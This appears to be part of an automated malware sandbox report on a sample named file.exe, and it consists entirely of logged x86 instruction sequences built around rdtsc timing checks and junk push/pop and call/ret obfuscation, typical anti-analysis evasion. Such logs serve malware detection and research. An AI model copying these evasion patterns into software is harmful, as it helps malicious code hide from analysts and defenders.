Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C30910 second address: C30914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C30914 second address: C30932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7A4900AE6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F7A4900AE66h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3117A second address: C31180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C312CB second address: C31305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F7A4900AE6Bh 0x00000011 pop eax 0x00000012 push esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007F7A4900AE76h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31426 second address: C3142A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3142A second address: C31436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F7A4900AE66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31436 second address: C31469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A49940184h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31469 second address: C3146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3146D second address: C3147D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F7A49940176h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C315B7 second address: C315BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C315BB second address: C315F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A49940181h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F7A49940176h 0x00000012 jmp 00007F7A4994017Eh 0x00000017 popad 0x00000018 pop edx 0x00000019 pushad 0x0000001a jc 00007F7A4994017Ah 0x00000020 push esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31F13 second address: C31F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C31F19 second address: C31F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C320AD second address: C320C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7A4900AE66h 0x00000008 jmp 00007F7A4900AE70h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C323C5 second address: C323D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7A4994017Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jg 00007F7A49940176h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFEE61 second address: BFEE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39864 second address: C3986A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3986A second address: C3986E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3986E second address: C3987F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3987F second address: C3989D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4900AE79h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3989D second address: C398C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F7A49940189h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398C6 second address: C398CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398CA second address: C398D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398D0 second address: C398DA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7A4900AE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398DA second address: C398E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C398E9 second address: C398EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37FC3 second address: C37FC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38749 second address: C38753 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38753 second address: C38757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38757 second address: C3875B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C399C6 second address: C399D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7A49940178h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C399D8 second address: C399DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C399DC second address: C399E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C399E6 second address: C39A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007F7A4900AE74h 0x00000011 pushad 0x00000012 je 00007F7A4900AE66h 0x00000018 js 00007F7A4900AE66h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jmp 00007F7A4900AE71h 0x00000027 jmp 00007F7A4900AE6Ch 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 pushad 0x00000032 jnl 00007F7A4900AE6Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7A4900AE70h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C39BA9 second address: C39BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3CF6E second address: C3CF78 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7A4900AE6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C402AF second address: C402B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C402B3 second address: C402B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4035E second address: C40368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40368 second address: C4036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4036C second address: C4041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7A4994017Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F7A49940185h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F7A49940180h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jns 00007F7A49940184h 0x00000028 pop eax 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F7A49940178h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 call 00007F7A49940186h 0x00000048 mov si, 1CD5h 0x0000004c pop esi 0x0000004d mov edi, dword ptr [ebp+122D2A8Ch] 0x00000053 call 00007F7A49940179h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push edi 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4041A second address: C4041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4041E second address: C40424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40717 second address: C40729 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A4900AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40729 second address: C40733 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40B1B second address: C40B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40B27 second address: C40B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40C27 second address: C40C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40C2D second address: C40C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40C31 second address: C40C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4108C second address: C41096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7A49940176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41096 second address: C410A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F7A4900AE66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41115 second address: C4111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4111A second address: C4119A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A4900AE74h 0x00000008 jmp 00007F7A4900AE77h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jng 00007F7A4900AE6Eh 0x00000017 push eax 0x00000018 jc 00007F7A4900AE66h 0x0000001e pop eax 0x0000001f xchg eax, ebx 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F7A4900AE68h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a nop 0x0000003b jmp 00007F7A4900AE75h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4119A second address: C4119E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4119E second address: C411B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4900AE76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C417D8 second address: C417E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C417E5 second address: C41839 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7A4900AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F7A4900AE68h 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F7A4900AE68h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e jno 00007F7A4900AE6Ch 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jns 00007F7A4900AE66h 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41839 second address: C4183D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42724 second address: C4272A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C425EA second address: C425FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A4994017Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4272A second address: C42784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F7A4900AE68h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov si, ax 0x00000028 sub edi, dword ptr [ebp+122D29B0h] 0x0000002e push 00000000h 0x00000030 jmp 00007F7A4900AE6Dh 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D2A34h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007F7A4900AE66h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C425FA second address: C425FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42784 second address: C4278A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C437AD second address: C437B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42F5F second address: C42F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44DDE second address: C44DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44DE3 second address: C44E32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F7A4900AE66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F7A4900AE79h 0x00000014 nop 0x00000015 mov esi, 5132CB00h 0x0000001a mov edi, dword ptr [ebp+122D26F7h] 0x00000020 push 00000000h 0x00000022 mov esi, ebx 0x00000024 push 00000000h 0x00000026 jmp 00007F7A4900AE6Ah 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push edx 0x0000002f jbe 00007F7A4900AE66h 0x00000035 pop edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44E32 second address: C44E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7A49940176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C45880 second address: C45884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46DCD second address: C46DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A5FE second address: C4A602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A602 second address: C4A608 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A608 second address: C4A60E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BBED second address: C4BC7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7A49940178h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov bx, ax 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D2058h], edx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F7A49940178h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movsx edi, si 0x0000004e call 00007F7A49940184h 0x00000053 sub dword ptr [ebp+1249332Fh], edx 0x00000059 pop edi 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F7A4994017Fh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4ADFC second address: C4AE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4CBB7 second address: C4CBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7A4994017Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BE94 second address: C4BE9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7A4900AE66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BE9E second address: C4BEC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4BEC8 second address: C4BECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DD7B second address: C4DD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4DD80 second address: C4DD86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4F9F2 second address: C4FAA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A49940188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F7A49940178h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 xor dword ptr [ebp+122D33B4h], esi 0x0000002c mov bx, dx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F7A49940178h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jmp 00007F7A49940180h 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D1B99h], ecx 0x00000058 xchg eax, esi 0x00000059 jg 00007F7A49940180h 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007F7A49940184h 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4ED6F second address: C4ED73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4ED73 second address: C4ED79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4ED79 second address: C4ED7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50A9D second address: C50AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A49940181h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
